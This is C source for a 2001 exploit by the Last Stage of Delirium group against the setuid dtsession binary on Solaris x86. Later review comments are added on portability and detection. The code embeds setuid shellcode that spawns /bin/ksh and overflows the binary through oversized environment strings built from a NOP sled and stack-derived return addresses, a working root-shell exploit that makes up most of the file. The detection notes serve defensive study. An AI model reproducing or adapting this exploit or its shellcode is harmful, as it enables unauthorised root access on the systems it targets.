
  1. /*## copyright LAST STAGE OF DELIRIUM mar 2001 poland        *://lsd-pl.net/ #*/
  2. /*## /usr/dt/bin/dtsession                                                   #*/
  3.  
/* Repetition counts for the filler regions that main() writes into its two
 * environment strings (see the byte-copy loops there).  Only the counts are
 * named; the widths of the repeated values are fixed at 4 bytes in main(). */
#define NOPNUM 6000
#define ADRNUM 400
#define PCHNUM 6000
#define JMPNUM 6000
  8.  
/* Solaris/x86 payload bytes, annotated per instruction by the original author.
 * Bytes are kept verbatim; only the annotations were reviewed.  The seven bytes
 * following the first "call" carry no annotation in the original.
 * NOTE(review): the "\x88\x42\x08" line was annotated as 0x7(%edx); the disp8
 * byte is 0x08, so the annotation below reads 0x8(%edx). */
char setuidshellcode[]=
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x08"             /* jmp     <setuidshellcode+12>   */
    "\x5f"                 /* popl    %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x47\x01"         /* movb    %al,0x1(%edi)          */
    "\xeb\x0d"             /* jmp     <setuidshellcode+25>   */
    "\xe8\xf3\xff\xff\xff" /* call    <setuidshellcode+4>    */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xe8\xee\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xeb\x16"             /* jmp     <setuidshellcode+59>   */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x52"                 /* pushl   %edx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xe8\xd6\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xe8\xe5\xff\xff\xff" /* call    <setuidshellcode+37>   */
    "/bin/ksh"
;
  41.  
/* Two instructions that main() calls as a function to read the current stack
 * pointer.  This relies on the data segment being executable; on systems that
 * map data non-executable (NX / W^X) the call faults instead. */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;
  46.  
/*
 * Entry point.  Historical (March 2001) proof-of-concept against the setuid
 * /usr/dt/bin/dtsession on Solaris x86, per the banner printed below.  The
 * affected releases are long out of support; the code is kept for reference
 * and is not portable (the offsets below are fixed for the author's setup).
 *
 * argv[1]: X display string, forwarded to the child as DISPLAY=.
 *
 * Review notes:
 *  - there are no #include lines, so printf/sprintf/strlen/exit/execle are
 *    implicitly declared; C99 removed that and current compilers reject it;
 *  - main() has an implicit int return type and never returns a value;
 *  - for detection, the observable artefacts are an execle() of
 *    /usr/dt/bin/dtsession with argv[0] "lsd" and an environment carrying an
 *    ~18 KB "xxx=" value and a ~400-byte "LANG=" value, neither of which a
 *    legitimate session would set.
 */
main(int argc,char **argv){
    char buffer[20000],*b,adr[4],pch[4],jmp[4],*envp[4],display[128];
    unsigned int i;                       /* loop counter; also reused as a scratch value */

    printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/\n");
    printf("/usr/dt/bin/dtsession for solaris 2.7 (2.6,2.8 ?) x86\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    /* Three 4-byte values derived from the current stack pointer (obtained by
     * calling the bytes in jump[] as a function) plus constants that are
     * presumably tuned to the author's machine -- NOTE(review): not portable. */
    *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+3540+3000-0x4d0;
    *((unsigned int*)pch)=((*(unsigned int(*)())jump)())+3540+3000+6000;
    *((unsigned int*)jmp)=((*(unsigned int(*)())jump)())+3540+3000+6000+6000;

    /* Rotate the 32-bit value in adr right by 8 bits; i is a temporary here. */
    *((unsigned int*)adr)=(((i=*((unsigned int*)adr))>>8))|(i<<24);

    /* Unbounded copy: an argv[1] longer than 119 bytes overflows display[]. */
    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=&buffer[0];                   /* "xxx=..." string built below */
    envp[1]=&buffer[19000];               /* "LANG=..." string built below */
    envp[2]=display;
    envp[3]=0;

    /* First environment string: PCHNUM+JMPNUM+NOPNUM filler bytes followed by
     * the payload bytes -- about 18 KB, which stays below offset 19000. */
    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<JMPNUM;i++) *b++=jmp[i%4];
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    /* strlen() stops at the first NUL, so the payload must contain none;
     * strlen() is re-evaluated on every iteration (unsigned int vs size_t). */
    for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
    *b=0;

    /* Second environment string at buffer+19000: ADRNUM bytes cycling adr[]. */
    b=&buffer[19000];
    sprintf(b,"LANG=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    /* The terminating 0 should be (char *)0 in a variadic argument list.  If
     * execle() fails nothing is reported and main() simply falls off the end. */
    execle("/usr/dt/bin/dtsession","lsd",0,envp);
}
  88. /*                www.hack.co.za           [14 April 2001]*/